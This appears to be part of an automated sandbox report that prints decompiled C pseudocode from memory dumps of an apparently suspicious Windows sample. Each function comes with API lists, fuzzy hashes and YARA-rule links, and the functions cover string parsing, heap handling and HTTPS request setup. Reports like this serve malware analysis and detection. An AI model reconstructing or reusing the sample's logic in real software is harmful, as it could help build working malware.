				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4cdd364; // 0x58b95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x4cdd030) {
					HeapFree( *0x4cdd270, 0, _t8);
				}
				_t9 = E04CD5141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x4cdd364; // 0x58b95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                          0x04cd9311
                                                                                                                          0x04cd9311
                                                                                                                          0x04cd931a
                                                                                                                          0x04cd932a
                                                                                                                          0x04cd932a
                                                                                                                          0x04cd932f
                                                                                                                          0x04cd9334
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd9324
                                                                                                                          0x04cd9324
                                                                                                                          0x04cd9336
                                                                                                                          0x04cd933a
                                                                                                                          0x04cd934c
                                                                                                                          0x04cd934c
                                                                                                                          0x04cd9357
                                                                                                                          0x04cd935c
                                                                                                                          0x04cd935f
                                                                                                                          0x04cd9364
                                                                                                                          0x04cd9368
                                                                                                                          0x04cd936e

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD931A
                                                                                                                          • Sleep.KERNEL32(0000000A,?,04CD5390), ref: 04CD9324
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,04CD5390), ref: 04CD934C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD9368
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 58946197-0
                                                                                                                          • Opcode ID: d2be6cd4ea3b35bd94c0323e9bae8fe03baaeac45efdd6e3d4cd4b6c17a4f4ca
                                                                                                                          • Instruction ID: 6e56d7cd242e435d1f4e4e620ab4eda6db3ddc26be087f63232c77beffea56a3
                                                                                                                          • Opcode Fuzzy Hash: d2be6cd4ea3b35bd94c0323e9bae8fe03baaeac45efdd6e3d4cd4b6c17a4f4ca
                                                                                                                          • Instruction Fuzzy Hash: 72F012B9A06240ABE7249F65DD48F1A7BB9FF15344B044418F643D71A0C638FD40DB15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD121A, Relevance: 4.6, APIs: 3, Instructions: 97COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 18%
                                                                                                                          			E04CD121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6f5efd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E04CD75F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E04CD75F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E04CD4AAB(_v20);
					}
					goto L12;
				}
			}












                                                                                                                          0x04cd1220
                                                                                                                          0x04cd1227
                                                                                                                          0x04cd122a
                                                                                                                          0x04cd122d
                                                                                                                          0x04cd122f
                                                                                                                          0x04cd1234
                                                                                                                          0x04cd1317
                                                                                                                          0x04cd131d
                                                                                                                          0x04cd131d
                                                                                                                          0x04cd123e
                                                                                                                          0x04cd1245
                                                                                                                          0x04cd124d
                                                                                                                          0x04cd130e
                                                                                                                          0x04cd1314
                                                                                                                          0x00000000
                                                                                                                          0x04cd1314
                                                                                                                          0x04cd1256
                                                                                                                          0x04cd125a
                                                                                                                          0x04cd125b
                                                                                                                          0x04cd125c
                                                                                                                          0x04cd1262
                                                                                                                          0x04cd1263
                                                                                                                          0x04cd1268
                                                                                                                          0x04cd126f
                                                                                                                          0x00000000
                                                                                                                          0x04cd1275
                                                                                                                          0x04cd1284
                                                                                                                          0x04cd1287
                                                                                                                          0x04cd128a
                                                                                                                          0x04cd1293
                                                                                                                          0x04cd1298
                                                                                                                          0x04cd129d
                                                                                                                          0x04cd1305
                                                                                                                          0x04cd129f
                                                                                                                          0x04cd12a2
                                                                                                                          0x04cd12a6
                                                                                                                          0x04cd12a7
                                                                                                                          0x04cd12a8
                                                                                                                          0x04cd12a9
                                                                                                                          0x04cd12ab
                                                                                                                          0x04cd12b2
                                                                                                                          0x04cd12f8
                                                                                                                          0x04cd12b4
                                                                                                                          0x04cd12b4
                                                                                                                          0x04cd12bf
                                                                                                                          0x04cd12cd
                                                                                                                          0x04cd12d1
                                                                                                                          0x04cd12e9
                                                                                                                          0x04cd12d3
                                                                                                                          0x04cd12dc
                                                                                                                          0x04cd12e4
                                                                                                                          0x04cd12e4
                                                                                                                          0x04cd12d1
                                                                                                                          0x04cd12fe
                                                                                                                          0x04cd12fe
                                                                                                                          0x00000000
                                                                                                                          0x04cd129d

                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD130E
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • wcstombs.NTDLL ref: 04CD12DC
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD12F2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2631933831-0
                                                                                                                          • Opcode ID: 57f8b5dac1b9b8eeee96b12cf391ac3147929046010e36435f0d176f6713c15c
                                                                                                                          • Instruction ID: 052228ccdff3f42aa41e54c967e7c68559fab7022990ded8158a9bef1569be89
                                                                                                                          • Opcode Fuzzy Hash: 57f8b5dac1b9b8eeee96b12cf391ac3147929046010e36435f0d176f6713c15c
                                                                                                                          • Instruction Fuzzy Hash: 74311CB5900208EFDB10DFA5CD80EAEB7F9FF48344F144569E642E3250EB31AA44DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD502E, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04CD37AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4cdd2e0; // 0xbda5a8
				_t4 = _t24 + 0x4cdedc8; // 0x58b9370
				_t5 = _t24 + 0x4cded70; // 0x4f0053
				_t26 = E04CD4B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4cdd2e0; // 0xbda5a8
						_t11 = _t32 + 0x4cdedbc; // 0x58b9364
						_t48 = _t11;
						_t12 = _t32 + 0x4cded70; // 0x4f0053
						_t52 = E04CD131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4cdd2e0; // 0xbda5a8
							_t13 = _t35 + 0x4cdee06; // 0x30314549
							_t37 = E04CD117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4cdd294 - 6;
								if( *0x4cdd294 <= 6) {
									_t42 =  *0x4cdd2e0; // 0xbda5a8
									_t15 = _t42 + 0x4cdec12; // 0x52384549
									E04CD117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4cdd2e0; // 0xbda5a8
							_t17 = _t38 + 0x4cdee00; // 0x58b93a8
							_t18 = _t38 + 0x4cdedd8; // 0x680043
							_t45 = E04CD5DDA(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x4cdd270, 0, _t52);
						}
					}
					HeapFree( *0x4cdd270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04CD51BB(_t54);
				}
				return _t45;
			}



















                                                                                                                          0x04cd502e
                                                                                                                          0x04cd503e
                                                                                                                          0x04cd5041
                                                                                                                          0x04cd5048
                                                                                                                          0x04cd504a
                                                                                                                          0x04cd504a
                                                                                                                          0x04cd504d
                                                                                                                          0x04cd5052
                                                                                                                          0x04cd5059
                                                                                                                          0x04cd5066
                                                                                                                          0x04cd506b
                                                                                                                          0x04cd506f
                                                                                                                          0x04cd507d
                                                                                                                          0x04cd508b
                                                                                                                          0x04cd508f
                                                                                                                          0x04cd5120
                                                                                                                          0x04cd5120
                                                                                                                          0x04cd5095
                                                                                                                          0x04cd5095
                                                                                                                          0x04cd509a
                                                                                                                          0x04cd509a
                                                                                                                          0x04cd50a1
                                                                                                                          0x04cd50ad
                                                                                                                          0x04cd50af
                                                                                                                          0x04cd50b1
                                                                                                                          0x04cd50b3
                                                                                                                          0x04cd50ba
                                                                                                                          0x04cd50c5
                                                                                                                          0x04cd50cc
                                                                                                                          0x04cd50ce
                                                                                                                          0x04cd50d5
                                                                                                                          0x04cd50d7
                                                                                                                          0x04cd50de
                                                                                                                          0x04cd50e9
                                                                                                                          0x04cd50e9
                                                                                                                          0x04cd50d5
                                                                                                                          0x04cd50ee
                                                                                                                          0x04cd50f3
                                                                                                                          0x04cd50fa
                                                                                                                          0x04cd5118
                                                                                                                          0x04cd511a
                                                                                                                          0x04cd511a
                                                                                                                          0x04cd50b1
                                                                                                                          0x04cd512c
                                                                                                                          0x04cd512c
                                                                                                                          0x04cd512e
                                                                                                                          0x04cd5133
                                                                                                                          0x04cd5135
                                                                                                                          0x04cd5135
                                                                                                                          0x04cd5140

                                                                                                                          APIs
                                                                                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058B9370,00000000,?,73BCF710,00000000,73BCF730), ref: 04CD507D
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058B93A8,?,00000000,30314549,00000014,004F0053,058B9364), ref: 04CD511A
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04CD54EF), ref: 04CD512C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: d3c38f435c3fd170a46e0546bb3e3db83428b2ce134544877871a147237f7274
                                                                                                                          • Instruction ID: b132c186c95293e424241b43841537c537e5d535696318b179eaa63e1c4b7e41
                                                                                                                          • Opcode Fuzzy Hash: d3c38f435c3fd170a46e0546bb3e3db83428b2ce134544877871a147237f7274
                                                                                                                          • Instruction Fuzzy Hash: A7319179A40509BFEB21EF90DD88EAA7BBEFB08704F144166A7029B150D671FE05DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD5141, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 47%
                                                                                                                          			E04CD5141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04CD75F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4cdc2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                          0x04cd5145
                                                                                                                          0x04cd5152
                                                                                                                          0x04cd5154
                                                                                                                          0x04cd5155
                                                                                                                          0x04cd515d
                                                                                                                          0x04cd515d
                                                                                                                          0x04cd5161
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd5158
                                                                                                                          0x04cd5159
                                                                                                                          0x04cd515c
                                                                                                                          0x04cd515c
                                                                                                                          0x04cd5169
                                                                                                                          0x04cd516e
                                                                                                                          0x04cd5173
                                                                                                                          0x04cd517b
                                                                                                                          0x04cd5181
                                                                                                                          0x04cd5183
                                                                                                                          0x04cd5186
                                                                                                                          0x04cd518a
                                                                                                                          0x04cd518c
                                                                                                                          0x04cd518f
                                                                                                                          0x04cd518f
                                                                                                                          0x04cd5190
                                                                                                                          0x04cd5192
                                                                                                                          0x04cd518f
                                                                                                                          0x04cd519c
                                                                                                                          0x04cd519f
                                                                                                                          0x04cd51a2
                                                                                                                          0x04cd51a3
                                                                                                                          0x04cd51a5
                                                                                                                          0x04cd51ac
                                                                                                                          0x04cd51ac
                                                                                                                          0x04cd51b8

                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,00000000,058B95AC,04CD5390,?,04CD935C,?,058B95AC,?,04CD5390), ref: 04CD515D
                                                                                                                          • StrTrimA.SHLWAPI(?,04CDC2A4,00000002,?,04CD935C,?,058B95AC,?,04CD5390), ref: 04CD517B
                                                                                                                          • StrChrA.SHLWAPI(?,00000020,?,04CD935C,?,058B95AC,?,04CD5390), ref: 04CD5186
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Trim
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3043112668-0
                                                                                                                          • Opcode ID: 6360d9005dbc542d6bd2da649fdede735b436c014eef832e779df029e1d426f0
                                                                                                                          • Instruction ID: fddcbd8c12c345b5875e9ac790e74da47e7fc2e3b797443b2663f817a466b4b6
                                                                                                                          • Opcode Fuzzy Hash: 6360d9005dbc542d6bd2da649fdede735b436c014eef832e779df029e1d426f0
                                                                                                                          • Instruction Fuzzy Hash: 0C01B1797003467FE7204E2A8C44F67BF9FEB8A348F041011BB55CB282E670E901C760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD7749, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 23%
                                                                                                                          			E04CD7749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t34;
				long _t36;
				unsigned int _t37;
				signed int _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E04CD1922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E04CD4AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E04CD1922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6f5ef5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E04CD4AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E04CD1922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x4cdd2e0; // 0xbda5a8
										_t19 = _t42 + 0x4cde758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E04CD4AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                                          0x04cd7749
                                                                                                                          0x04cd7758
                                                                                                                          0x04cd775e
                                                                                                                          0x04cd788f
                                                                                                                          0x04cd788f
                                                                                                                          0x04cd7764
                                                                                                                          0x04cd7764
                                                                                                                          0x04cd776a
                                                                                                                          0x04cd776c
                                                                                                                          0x04cd777c
                                                                                                                          0x04cd777c
                                                                                                                          0x04cd776e
                                                                                                                          0x04cd776e
                                                                                                                          0x04cd7777
                                                                                                                          0x04cd7777
                                                                                                                          0x04cd7770
                                                                                                                          0x04cd7770
                                                                                                                          0x04cd7775
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7775
                                                                                                                          0x04cd776e
                                                                                                                          0x04cd778a
                                                                                                                          0x04cd7791
                                                                                                                          0x04cd7794
                                                                                                                          0x04cd779c
                                                                                                                          0x00000000
                                                                                                                          0x04cd77a2
                                                                                                                          0x04cd77a4
                                                                                                                          0x04cd77a9
                                                                                                                          0x04cd77ae
                                                                                                                          0x00000000
                                                                                                                          0x04cd77b4
                                                                                                                          0x04cd77b4
                                                                                                                          0x04cd77bd
                                                                                                                          0x04cd77d4
                                                                                                                          0x04cd77e0
                                                                                                                          0x04cd77e9
                                                                                                                          0x04cd77ec
                                                                                                                          0x04cd77f4
                                                                                                                          0x00000000
                                                                                                                          0x04cd77fa
                                                                                                                          0x04cd77fd
                                                                                                                          0x04cd7809
                                                                                                                          0x04cd780f
                                                                                                                          0x00000000
                                                                                                                          0x04cd7811
                                                                                                                          0x04cd7814
                                                                                                                          0x04cd781d
                                                                                                                          0x04cd781d
                                                                                                                          0x04cd7827
                                                                                                                          0x04cd782e
                                                                                                                          0x04cd7831
                                                                                                                          0x04cd7836
                                                                                                                          0x04cd783b
                                                                                                                          0x00000000
                                                                                                                          0x04cd783d
                                                                                                                          0x04cd783f
                                                                                                                          0x04cd784b
                                                                                                                          0x04cd784e
                                                                                                                          0x04cd7856
                                                                                                                          0x04cd7858
                                                                                                                          0x04cd7869
                                                                                                                          0x04cd7869
                                                                                                                          0x04cd786b
                                                                                                                          0x04cd786f
                                                                                                                          0x04cd7870
                                                                                                                          0x04cd7872
                                                                                                                          0x04cd7879
                                                                                                                          0x00000000
                                                                                                                          0x04cd787b
                                                                                                                          0x04cd787b
                                                                                                                          0x04cd787f
                                                                                                                          0x04cd7880
                                                                                                                          0x04cd7882
                                                                                                                          0x04cd7889
                                                                                                                          0x00000000
                                                                                                                          0x04cd788b
                                                                                                                          0x04cd788b
                                                                                                                          0x04cd788b
                                                                                                                          0x04cd7889
                                                                                                                          0x04cd7879
                                                                                                                          0x04cd783b
                                                                                                                          0x04cd780f
                                                                                                                          0x04cd77bf
                                                                                                                          0x04cd77ca
                                                                                                                          0x04cd77ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd77ce
                                                                                                                          0x04cd77bd
                                                                                                                          0x04cd77ae
                                                                                                                          0x04cd779c
                                                                                                                          0x04cd7898

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                          • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,04CD544C,00000000,00000000,058B9618,?,?,04CD2A8A,?,058B9618,0000EA60), ref: 04CD7764
                                                                                                                          • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,04CD544C,00000000,00000000,058B9618,?,?,04CD2A8A,?,058B9618,0000EA60), ref: 04CD788F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4097109750-0
                                                                                                                          • Opcode ID: 79d55b032b21d07beb53a9fa43b5d717c78b5aacfe13b5f8dff2fe5b6fabf207
                                                                                                                          • Instruction ID: f3cddb28f2cf22d971158b1af0d18d2cb9795eb891bdaed0dec47cf72e77cf70
                                                                                                                          • Opcode Fuzzy Hash: 79d55b032b21d07beb53a9fa43b5d717c78b5aacfe13b5f8dff2fe5b6fabf207
                                                                                                                          • Instruction Fuzzy Hash: FC416D76501208BFEB259FA0DC85EAA7BBEEB04740F044939F742A6090E771EE44DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD144D, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 75%
                                                                                                                          			E04CD144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04CD3DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4cdd2e0; // 0xbda5a8
						_t20 = _t68 + 0x4cde1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04CD47EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                          0x04cd1453
                                                                                                                          0x04cd1456
                                                                                                                          0x04cd1466
                                                                                                                          0x04cd146f
                                                                                                                          0x04cd1473
                                                                                                                          0x04cd1541
                                                                                                                          0x04cd1547
                                                                                                                          0x04cd1547
                                                                                                                          0x04cd148d
                                                                                                                          0x04cd1492
                                                                                                                          0x04cd1496
                                                                                                                          0x04cd149c
                                                                                                                          0x04cd14a1
                                                                                                                          0x04cd14a8
                                                                                                                          0x04cd14b7
                                                                                                                          0x04cd14b7
                                                                                                                          0x04cd14bb
                                                                                                                          0x04cd14bd
                                                                                                                          0x04cd14c9
                                                                                                                          0x04cd14d4
                                                                                                                          0x04cd14df
                                                                                                                          0x04cd14e3
                                                                                                                          0x04cd14ed
                                                                                                                          0x04cd14f1
                                                                                                                          0x04cd14f3
                                                                                                                          0x04cd14f8
                                                                                                                          0x04cd14ff
                                                                                                                          0x04cd150f
                                                                                                                          0x04cd150f
                                                                                                                          0x04cd14f8
                                                                                                                          0x04cd14f1
                                                                                                                          0x04cd1511
                                                                                                                          0x04cd1516
                                                                                                                          0x04cd151b
